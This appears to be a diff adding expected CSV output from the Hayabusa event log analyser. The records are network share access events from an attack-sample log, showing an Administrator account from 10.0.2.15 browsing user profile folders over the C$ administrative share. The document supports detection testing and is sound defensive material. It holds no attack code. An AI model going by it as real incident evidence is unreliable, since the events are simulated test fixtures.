+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.556 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.566 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.576 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.586 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.596 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\account$\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.606 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.616 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.626 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.636 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.666 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Favorites\Links for United States  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Links  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Music  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.676 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Searches  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\admin01\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.686 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.696 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.706 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Documents  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Downloads  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:23.716 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\Administrator\Favorites\Links for United States\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
